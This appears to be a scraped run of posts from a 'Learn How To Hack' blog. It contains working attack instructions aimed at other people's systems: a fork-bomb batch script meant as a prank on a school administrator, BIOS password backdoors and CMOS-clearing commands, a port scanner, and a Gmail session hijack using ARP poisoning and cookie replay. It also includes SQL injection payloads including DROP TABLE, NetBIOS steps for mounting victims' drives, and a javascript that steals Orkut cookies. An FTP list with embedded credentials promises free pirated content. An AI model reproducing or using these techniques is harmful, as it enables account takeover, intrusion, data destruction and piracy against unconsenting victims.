Here is a list of 50+ FTP sites that will allow you download content for free. Don’t forget to share and bookmark this page so that everyone can take advantage of it.

1. ftp://ftp.freenet.de/pub/filepilot/
2. ftp://193.43.36.131/Radio/MP3/
3. ftp://195.216.160.175/
4. ftp://207.71.8.54:21/games/
5. ftp://194.44.214.3/pub/music/
6. ftp://202.118.66.15/pub/books
7. ftp://129.241.210.42/pub/games/
8. ftp://clubmusic:clubmusic@217.172.16.3:8778/
9. ftp://212.174.160.21/games
10. ftp://ftp.uar.net/pub/e-books/
11. ftp://129.241.210.42/pub/games/
12. ftp://193.231.238.4/pub/
13. ftp://207.71.8.54/games/
14. ftp://194.187.207.98/video/
15. ftp://194.187.207.98/music/
16. ftp://194.187.207.98/soft/
17. ftp://194.187.207.98/games/
18. ftp://ftp.uglan.ck.ua/
19. ftp://159.153.197.74/pub
20. ftp://leech:l33ch@61.145.123.141:5632/
21. ftp://psy:psy@ftp.cybersky.ru
22. ftp://130.89.175.1/pub/games/
23. ftp://194.44.214.3/pub/
24. ftp://195.116.114.144:21/
25. ftp://64.17.191.56:21/
26. ftp://80.255.128.148:21/pub/
27. ftp://83.149.236.35:21/packages/
28. ftp://129.241.56.118/
29. ftp://81.198.60.10:21/
30. ftp://128.10.252.10/pub/
31. ftp://129.241.210.42/pub/
32. ftp://137.189.4.14/pub
33. ftp://139.174.2.36/pub/
34. ftp://147.178.1.101/
35. ftp://156.17.62.99/
36. ftp://159.153.197.74/pub/
37. ftp://193.140.54.18/pub/
38. ftp://192.67.63.35/
39. ftp://166.70.161.34/
40. ftp://195.161.112.15/musik/
41. ftp://195.161.112.15/
42. ftp://195.131.10.164/software
43. ftp://195.146.65.20/pub/win/
44. ftp://199.166.210.164/
45. ftp://195.46.96.194/pub/
46. ftp://61.136.76.236/
47. ftp://61.154.14.248/
48. ftp://62.210.158.81/
49. ftp://62.232.57.61/
50. ftp://212.122.1.85/pub/software/
51. ftp://193.125.152.110/pub/.1/misc/sounds/mp3/murray/

Download Free Softwares, Games, Movies and lot of Hacking Stuff from 50+ FTP Sites is a post from: Learn How To Hack If you enjoyed this post, make sure you Subscribe to my RSS feed!

Related posts:

1. Netbios Hacking- The Ethical Hacking
2. Hacking Gmail account using GX Cookie
3. How to make a Fork Bomb (Rabbit Virus)

Introduction

Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.

A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.

Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.

The code

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…

Blocks of code should be set as style “Formatted” like this.

:s

START %0

GOTO :s

Have fun guys and do leave your feedback about this article!

How to make a Fork Bomb (Rabbit Virus) is a post from: Learn How To Hack If you enjoyed this post, make sure you Subscribe to my RSS feed!

Related posts:

1. Tutorial On Ardamax 3.0 Keyloggers
2. How to make a Virus File Undetected By Antivirus Programs
3. Netbios Hacking- The Ethical Hacking

DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter

Restart the computer. It works on most versions of the AWARD BIOS.

Accessing information on the hard disk

When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.

Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer’s backdoor passwords:

AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet

AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

Other passwords you may try (for AMI/AWARD or other BIOSes)

LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj

Note that the key associated to “_” in the US keyboard corresponds to “?” in some European keyboards (such as Italian and German ones), so — for example — you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.

Flashing BIOS via software

If you have access to the computer when it’s turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory. However, it might happen you don’t have one of those programs when you have access to the computer, so you’d better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You’d better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:

AMI/AWARD BIOS

O 70 17
O 71 17
Q

PHOENIX BIOS

O 70 FF
O 71 17
Q

GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don’t have CMOS)

O 70 2E
O 71 FF
Q

Note that the first letter is a “O” not the number “0″. The numbers which follow are two bytes in hex format.

Flashing BIOS via hardware
If you can’t access the computer when it’s on, and the standard backdoor passwords didn’t work, you’ll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.
Using the jumpers

The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for “switching a jumper” I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard. To find the correct jumper you should read the motherboard’s manual.

Once you’ve located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.

If you don’t have the motherboard’s manual, you’ll have to “brute force” it… trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don’t know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.

If after flashing the BIOS, the computer won’t boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery

If you can’t find the jumper to flash the BIOS or if such jumper doesn’t exist, you can remove the battery that keeps the BIOS memory alive. It’s a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you’ll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I’d suggest you to remove it for about one hour to be sure, because if you put it back when the data aren’t erased yet you’ll have to wait more time, as you’ve never removed it. If at first it doesn’t work, try to remove the battery overnight.

Important note: in laptop and notebooks you don’t have to remove the computer’s power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.

Short-circuiting the chip

Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.

Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)

Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).

       gnd
       74
        |__________________
5v 75--|                   |
       |                   |
       |                   |
       |       CHIPS       |
   1 * |                   |
       |      P82C206      |
       |                   |
       |                   |
       |___________________|
        |                 |
        | gnd             | 5v
        12                32

OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).

    80              51
     |______________|
81 -|                |- 50
    |                |
    |                |
    |      OPTi      |
    |                |
    |     F82C206    |
    |                |
100-|________________|-31
     ||           | |
   1 ||           | | 30
      3           26

Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can’t flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.

CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can’t be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.

         __________
     1 -| *  U     |-  24 5v
     2 -|          |-  23
     3 -|          |-  22
     4 -|          |-  21 RCL (RAM Clear)
     5 -|          |-  20
     6 -|          |-  19
     7 -|          |-  18
     8 -|          |-  17
     9 -|          |-  16
    10 -|          |-  15
    11 -|          |-  14
gnd 12 -|__________|-  13

NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.

Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818. Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.

5v
 24          20                   13
 |___________|____________________|
|                                  |
|             DALLAS               |
|>                                 |
|            DS12885S              |
|                                  |
|__________________________________|
 |                                |
 1                                12
                                  gnd

Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners – lower left and upper right. You might also try pins 12 and 20.

          __________
     1  -| *  U     |-  24 5v
     2  -|          |-  23
     3  -|          |-  22
     4  -|          |-  21
     5  -|          |-  20
     6  -|          |-  19
     7  -|          |-  18
     8  -|          |-  17
     9  -|          |-  16
    10  -|          |-  15
    11  -|          |-  14
gnd 12  -|__________|-  13

Replacing the chip

If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It’s a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you’ll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you’ll then plug the new chip, in the eventuality that you’ll have to change it again. If you can’t find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer’s website to see if there’s the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.

Important

Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.

Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you’ll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn’t see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can’t find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:\WINDOWS, C:\WINDOWS\SYSTEM, or C:\WINDOWS\INF .

Key Disk for Toshiba laptops

Some Toshiba notebooks allow to bypass BIOS by inserting a “key-disk” in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it’s not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for “KEY” followed by two zeroes). Once you have created the key disk put it into the notebook’s drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You’ll enter the BIOS configuration where you can set a new password.

Key protected cases

A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

Basic BIOS password crack is a post from: Learn How To Hack If you enjoyed this post, make sure you Subscribe to my RSS feed!

Related posts:

1. How do The Crackers Crack IM, E-Mail and other accounts?
2. CRACK WIFI – Simple WEP Crack
3. How to make a Fork Bomb (Rabbit Virus)

A small but effective tool (if you know the right way to use it..you might do wonders..)

——————–
you need:

2 textboxes
1 listbox
3 commandbuttons
1 timer
1 winsock control
——————–

Private Sub Command1_Click()
  Timer1.Enabled = True
End Sub

Private Sub Command2_Click()
  Timer1.Enabled = False
  Text2.Text = "0"
End Sub

Private Sub Command3_Click()
  List1.Clear
End Sub

Private Sub Timer1_Timer()
  On Error Resume Next
  Winsock1.Close
  Text2.Text = Int(Text2.Text) + 1
  Winsock1.RemoteHost = Text1.Text
  Winsock1.RemotePort = Text2.Text
  Winsock1.Connect
End Sub

Private Sub Winsock1_Connect()
 List1.AddItem Winsock1.RemotePort & " is open!"
End Sub

——————–
Explanation:

text1 = IP to scan
text2 = starting port
list1 = list where all open ports are shown
command1 = start
command2 = stop and reset
command3 = clear port list
timer1 = will make the winsock control to try ports

A Port Scanner in VB is a post from: Learn How To Hack If you enjoyed this post, make sure you Subscribe to my RSS feed!

Related posts:

1. Netbios Hacking- The Ethical Hacking
2. How to make a Fork Bomb (Rabbit Virus)
3. Hacking Gmail account using GX Cookie

Introduction

Hacking web application was always curious for the script kiddies. And hacking free web email account is every geek first attempt. The method which I will describe in this post is not new; the same method can be applied to yahoo and other free web email services too.

The method we will be using is cookie stealing and replaying the same back to the Gmail server. There are many ways you can steal cookie, one of them is XSS (Cross site scripting) discussed by other is earlier post. But we won’t be using any XSS here, in our part of attack we will use some local tool to steal cookie and use that cookie to get an access to Gmail account.

Assumption:

• You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
• You know basic networking.

Tool used for this attack:

• Cain & Abel
• Network Miner
• Firefox web browser with Cookie Editor add-ons

Attack in detail:

We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.

We will go step by step,
If you are using Wireless network then you can skip this Step A.

A] Using Cain to do ARP poisoning and routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).

• Start Cain from Start > Program > Cain > Cain
• Click on Start/Stop Sniffer tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.
• Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select

All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list.
How to check your physical IP ?
> Click on start > Run type cmd and press enter, in the command prompt type
Ipconfig and enter. This should show your IP address assign to your PC.
It will have following outputs:

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xyz.com
IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

• Click on Configure > APR > Use Spoofed IP and MAC Address > IP

Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

• Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.

The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.

• Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.

B] Using Network Miner to capture cookie in plain text

We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.

We are using This tool because of its ease to use.

• Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
• From the “—Select network adaptor in the list—“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.

Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.

• Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.
• Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon

Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.

C] Using Firefox & cookie Editor to replay attack.

• Open Firefox and log in your gmail email account.
• from firefox click on Tools > cookie Editor.
• In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
• From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.
• Sorry! You can’t change password with cookie attack.

How to be saved from this kind of attack?
Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.
Settings > Browser connection > Always use https

Hacking Gmail account using GX Cookie is a post from: Learn How To Hack If you enjoyed this post, make sure you Subscribe to my RSS feed!

Related posts:

1. How to Hack Orkut Accounts through Cookie Stealing?
2. Netbios Hacking- The Ethical Hacking
3. How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]

Do subscribe and say thanks, If you like this video tutorial..

You can download the shown strings in the video from Here:

Click Here To Download!

Video only for educational purposes only!

Video Tutorial on SQL Injection is a post from: Learn How To Hack If you enjoyed this post, make sure you Subscribe to my RSS feed!

Related posts:

1. What is SQL Injection?
2. Tutorial On Ardamax 3.0 Keyloggers
3. How to Hack Orkut Accounts through Cookie Stealing?

SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.
The technique is powerful enough not only to expose the information to the user but also modify and delete the content which could prove disastrous to the company.

SQL injection vulnerabilities have three forms:

Incorrectly filtered special characters: escape characters

This form of SQL injection occurs when the user manipulates the SQL statements using characters such as  ’.  For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:
“SELECT * FROM users WHERE password =    ’” + password + “‘;”

Now suppose the userName and/or password so entered are”  ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:

“SELECT * FROM users WHERE password =’  ‘or ‘1’=’1 ‘;”

Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.

List of Some Important inputs used by hackers to use SQL Injection technique are:
a)  ‘ or ‘a’=’a
b)  ‘ or 1=1 –
c)  ‘ or 1=1; –
d)  ‘; select * from *; –
e)  ‘ (Single quote)(Here we look at the error)
f)  ‘; drop table users –

On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of “username” in the statement below would cause the deletion of the “users” table as well as the selection of all data from the “data” table (in essence revealing the information of every user):
a’;DROP TABLE users; SELECT * FROM data WHERE name LIKE ‘%

Incorrectly handling input data type

This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:
“SELECT * FROM user WHERE telephone = “+ input +”;”
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!

If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:

1. ‘ having 1=1 –
2. ‘ group by user.id having 1=1 –
3. ‘ group by users.id, users.username, users.password, users.privs having 1=1—
4. ‘ union select sum(users.username) from users—
5. ‘ union select sum(id) from users –

Vulnerabilities inside the database server

Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server’s real_escape_chars() functions.
If the database server is not properly configured then the access to the database can easily be found out by the hacker.
The hacker can get information regarding the database server using the following input:
‘ union select @@version,1,1,1—

1. Extended Stored Procedure Attacks
2. sp_who: this will show all users that are currently connected to the database.
3. xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.

In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer.

What is SQL Injection? is a post from: Learn How To Hack If you enjoyed this post, make sure you Subscribe to my RSS feed!

Related posts:

1. Video Tutorial on SQL Injection
2. How do The Crackers Crack IM, E-Mail and other accounts?
3. Tutorial On Ardamax 3.0 Keyloggers

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER.NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.

STEP-BY-STEP NETBIOS HACKING PROCEDURE

1.Open command prompt

2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP-TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS.BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).

Example: C:\>net view \\59.43.45.212

The above is an example for operation using command prompt.”net view” is one of the netbios command to view the shared resources of the remote computer.Here “59.43.45.212? is an IP address of remote computer that is to be hacked through Netbios.You have to substitute a vlaid IP address in it’s place.If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown.If not an error message is displayed. So repeat the procedure 2 with a different IP address.

3. After succeeding, use the “net use” command in the command prompt.The “net use” is another netbios command which makes it possible to hack remote drives or printers.

Example-1:
C:\>net use D: \\59.43.45.212\F
Example-2:
C:\>net use G: \\59.43.45.212\SharedDocs
Example-3:
C:\>net use I: \\59.43.45.212\Myprint

NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES,FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER.THAT IS IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT

F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer.These are displayed after giving “net use” command. “59.43.45.212? is the IP address of remote computer that you want to hack.

4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.
[ad code=1 align=center]
Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name.You can open it and access remote computer’s Hard-Drive.You can copy files,music,folders etc. from victim’s hard-drive.You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system.You can access files\folders quickly through “Command Prompt”.

NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios.That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed).So Repeat The Procedure 2,3 With Different IP Address.

Whoaa!! You are the KING!![ad code=1 align=center]

Netbios Hacking- The Ethical Hacking is a post from: Learn How To Hack If you enjoyed this post, make sure you Subscribe to my RSS feed!

Related posts:

1. How to Find the IP Address of a Remote Computer
2. A Beginner’s Guide to Ethical Hacking [E-Book]
3. Hacking Gmail account using GX Cookie

Follow the procedure and guess what…..You’ll learn another trick to hack orkut accounts apart from password stealing or Phishing.

Let me tell you guys again that- “THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHORS OF HACKINGARTICLES.COM ARE NOT LIABLE FOR ANY ILLEGAL ACT CARRIED OUT BY YOU OR ANYONE ELSE.”

Now without wasting anytime read the following procedure:

1.Firstly you need to have Mozilla firefox installed.
2.Download cookie editor plugin for Mozilla firefox from:

COOKIE EDITOR

3.You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.

Cookie Script:

javascript:nobody=replyForm;nobody.toUserId.value=34536569;
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?
Action.submit’;nobody.submit()

How to use cookies script?

1. Replace your Uid number “UserId.value=34536569?
How to Replace your Uid
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script.
Your script will look like.

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?
Action.submit’;nobody.submit()

2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter

3.You’ll Get his cookie in your scrapbook.

4.After Getting a cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools–> Cookie editor)

5.click filter/refresh.look for ‘orkut_state’ cookie. just double click it and replace the orkut_state part with your victim’s Script
put ur eight digit number in the place of (34536569).

Thats it your done with.

Logout of your orkut and login again and you’ll be in your victims Homepage.

6.So remember guys…if ur on orkut or having any other account….never click or paste in address bar any suspicious script to prevent anyone from hacking/accessing your account.

I hope you have learned how to hack orkut accounts using cookie stealing. Just the script can be used to hack orkut accounts and then access victim’s orkut account. You wont be hacking any password here. But just the cookies. Go have some fun with it and Do Not Forget To Subscribe.

How to Hack Orkut Accounts through Cookie Stealing? is a post from: Learn How To Hack If you enjoyed this post, make sure you Subscribe to my RSS feed!

Related posts:

1. Hacking Gmail account using GX Cookie
2. How do The Crackers Crack IM, E-Mail and other accounts?
3. Phishing Tutorial: Explained stepwise

Some times it becomes necessary to change the ICON of an executable(.exe) file so that the exe file get’s a new appearence.Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user.But in reality when the file is carried to a different computer, then it shows it’s original ICON itself.This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself.Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.

For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie:The tool changes the exe ICON permanantly.

I’ll give you a step-by-step instruction on how to use this tool to change the icon.

1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).

2. Right-click on the exe file whose ICON is to be changed.

3. Now you will see the option Change Icon…Click on that option.

4. Now the Icon Changer program will open up.

5. Icon changer will search for all the ICONS on your system so that you can select any one of those.

6. Now select the ICON of your choice and click on SET.

7. Now a popup window will appear and ask you to select from either of these two options.

• Change embeded icon.
• Adjust Windows to display custom icon.

Select the first option (Change embeded icon).

8. You are done.The ICON get’s changed.

How to Change the ICON of an EXE file ? is a post from: Learn How To Hack If you enjoyed this post, make sure you Subscribe to my RSS feed!

Related posts:

1. Tutorial On Ardamax 3.0 Keyloggers
2. Hacking Gmail account using GX Cookie
3. How to Find the IP Address of a Remote Computer